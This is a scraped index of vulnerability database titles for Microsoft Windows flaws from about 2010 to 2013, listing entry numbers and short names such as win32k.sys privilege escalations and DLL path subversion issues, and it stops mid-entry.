[90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution [83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft 